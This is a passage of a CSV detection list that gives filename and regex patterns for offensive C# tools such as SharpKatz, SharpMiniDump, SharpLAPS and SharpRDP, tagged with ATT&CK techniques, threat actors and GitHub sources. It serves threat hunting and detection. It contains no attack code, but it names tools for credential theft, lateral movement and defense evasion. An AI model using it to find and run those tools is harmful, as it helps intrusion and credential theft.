"*SharpIncrease-main.zip*",".{0,1000}SharpIncrease\-main\.zip.{0,1000}","offensive_tool_keyword","SharpIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/mertdas/SharpIncrease","1","1","N/A","N/A","6","2","148","30","2024-06-28T21:36:46Z","2023-03-14T23:35:32Z","59045"
"*sharpinline *",".{0,1000}sharpinline\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","59046"
"*SharpInvoke-SMBExec*",".{0,1000}SharpInvoke\-SMBExec.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","59047"
"*Sharpkatz*",".{0,1000}Sharpkatz.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59048"
"*SharpKatz.exe*",".{0,1000}SharpKatz\.exe.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","59049"
"*SharpKatz.exe*",".{0,1000}SharpKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59050"
"*SharpKatz.exe*",".{0,1000}SharpKatz\.exe.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","59051"
"*SharpKatz.exe*",".{0,1000}SharpKatz\.exe.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","1","N/A","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","59052"
"*SharpkatzManager*",".{0,1000}SharpkatzManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59053"
"*Sharp-Killer.csproj*",".{0,1000}Sharp\-Killer\.csproj.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","N/A","10","4","349","45","2024-08-29T12:23:34Z","2023-10-21T17:27:59Z","59054"
"*Sharp-Killer.exe*",".{0,1000}Sharp\-Killer\.exe.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","N/A","10","4","349","45","2024-08-29T12:23:34Z","2023-10-21T17:27:59Z","59055"
"*Sharp-Killer.pdb*",".{0,1000}Sharp\-Killer\.pdb.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","N/A","10","4","349","45","2024-08-29T12:23:34Z","2023-10-21T17:27:59Z","59056"
"*SharpKiller-main*",".{0,1000}SharpKiller\-main.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","N/A","10","4","349","45","2024-08-29T12:23:34Z","2023-10-21T17:27:59Z","59057"
"*SharpLAPS.csproj*",".{0,1000}SharpLAPS\.csproj.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","Dispossessor","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","N/A","10","5","408","85","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z","59058"
"*SharpLAPS.exe*",".{0,1000}SharpLAPS\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59059"
"*SharpLAPS.exe*",".{0,1000}SharpLAPS\..{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","Dispossessor","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","N/A","10","5","408","85","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z","59060"
"*SharpLAPS.sln*",".{0,1000}SharpLAPS\.sln.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","Dispossessor","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","N/A","10","5","408","85","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z","59061"
"*SharpLAPS-main*",".{0,1000}SharpLAPS\-main.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","Dispossessor","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","0","N/A","N/A","10","5","408","85","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z","59062"
"*SharpLDAP.csproj*",".{0,1000}SharpLDAP\.csproj.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","N/A","8","1","0","1","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z","59063"
"*SharpLDAP.exe*",".{0,1000}SharpLDAP\.exe.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","N/A","8","1","0","1","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z","59064"
"*SharpLDAP.sln*",".{0,1000}SharpLDAP\.sln.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","N/A","8","1","0","1","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z","59065"
"*SharpLDAP-main*",".{0,1000}SharpLDAP\-main.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","N/A","8","1","0","1","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z","59066"
"*SharpLdapRelayScan*",".{0,1000}SharpLdapRelayScan.{0,1000}","offensive_tool_keyword","SharpLdapRelayScan","SharLdapRealyScan is a tool to check Domain Controllers for LDAP server protections regarding the relay of NTLM authenticationvand it's a C# port of?LdapRelayScan","T1557.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Discovery","https://github.com/klezVirus/SharpLdapRelayScan","1","1","N/A","network exploitation tool","7","1","81","18","2022-02-26T22:03:11Z","2022-02-12T08:16:59Z","59067"
"*SharpLdapRelayScan*",".{0,1000}SharpLdapRelayScan.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","59068"
"*SharpMapExec.exe*",".{0,1000}SharpMapExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59069"
"*SharpMapExec-main.zip*",".{0,1000}SharpMapExec\-main\.zip.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","1","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","59070"
"*SharpMiniDump*",".{0,1000}SharpMiniDump.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59071"
"*SharpMiniDump.exe*",".{0,1000}SharpMiniDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59072"
"*SharpMiniDump.exe*",".{0,1000}SharpMiniDump\.exe.{0,1000}","offensive_tool_keyword","SharpMiniDump","Create a minidump of the LSASS process from memory","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/b4rtik/SharpMiniDump","1","1","N/A","N/A","10","3","260","49","2022-11-02T15:47:30Z","2019-09-15T13:45:42Z","59073"
"*SharpMiniDumpManager*",".{0,1000}SharpMiniDumpManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59074"
"*SharpMove.exe*",".{0,1000}SharpMove\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59075"
"*SharpNamedPipePTH*",".{0,1000}SharpNamedPipePTH.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","59076"
"*SharpNamedPipePTH.exe*",".{0,1000}SharpNamedPipePTH\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59077"
"*SharpNBTScan.exe*",".{0,1000}SharpNBTScan\.exe.{0,1000}","offensive_tool_keyword","SharpNBTScan","a NetBIOS scanner. Ghost actors use this tool for hostname and IP address enumeration","T1018 - T1046","TA0007","Ghost Ransomware","N/A","Discovery","https://github.com/BronzeTicket/SharpNBTScan","1","1","N/A","N/A","7","1","71","4","2021-08-06T05:36:55Z","2021-07-12T08:57:39Z","59078"
"*SharpNoPSExec*",".{0,1000}SharpNoPSExec.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","59079"
"*SharpNoPSExec.csproj*",".{0,1000}SharpNoPSExec\.csproj.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","N/A","10","7","615","90","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z","59080"
"*SharpNoPSExec.exe*",".{0,1000}SharpNoPSExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59081"
"*SharpNoPSExec.exe*",".{0,1000}SharpNoPSExec\.exe.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","N/A","10","7","615","90","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z","59082"
"*SharpNoPSExec.sln*",".{0,1000}SharpNoPSExec\.sln.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","N/A","10","7","615","90","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z","59083"
"*SharpNoPSExec-master*",".{0,1000}SharpNoPSExec\-master.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","N/A","10","7","615","90","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z","59084"
"*SharpPersistSD.RegHelper*",".{0,1000}SharpPersistSD\.RegHelper.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","59085"
"*SharpPersistSD.SecurityDescriptor*",".{0,1000}SharpPersistSD\.SecurityDescriptor.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","59086"
"*SharpPersistSD.SvcHelper*",".{0,1000}SharpPersistSD\.SvcHelper.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","59087"
"*sharppick.exe *",".{0,1000}sharppick\.exe\s.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","59088"
"*SharpPrinter.exe*",".{0,1000}SharpPrinter\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59089"
"*SharpPrintNightmare*",".{0,1000}SharpPrintNightmare.{0,1000}","offensive_tool_keyword","SharpPrintNightmare","C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527","T1210 - T1574 - T1204 - T1053 - T1021 - T1068 - T1071","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Exploitation tool","https://github.com/cube0x0/CVE-2021-1675","1","1","N/A","N/A","N/A","10","1879","582","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z","59090"
"*SharpPrintNightmare.exe*",".{0,1000}SharpPrintNightmare\.exe.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/cube0x0/CVE-2021-1675","1","1","N/A","N/A","10","10","1879","582","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z","59091"
"*sharpps $psversiontable*",".{0,1000}sharpps\s\$psversiontable.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","59092"
"*sharpps get-process*",".{0,1000}sharpps\sget\-process.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","59093"
"*sharppsexec*",".{0,1000}sharppsexec.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59094"
"*SharpPsExecManager*",".{0,1000}SharpPsExecManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59095"
"*SharpPsExecService.*",".{0,1000}SharpPsExecService\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59096"
"*SharpRDP.*.dll.bin*",".{0,1000}SharpRDP\..{0,1000}\.dll\.bin.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","59097"
"*SharpRDP.csproj*",".{0,1000}SharpRDP\.csproj.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","59098"
"*SharpRDP.exe*",".{0,1000}SharpRDP\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59099"
"*SharpRDP.exe*",".{0,1000}SharpRDP\.exe.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","59100"
"*SharpRDP.sln*",".{0,1000}SharpRDP\.sln.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","59101"
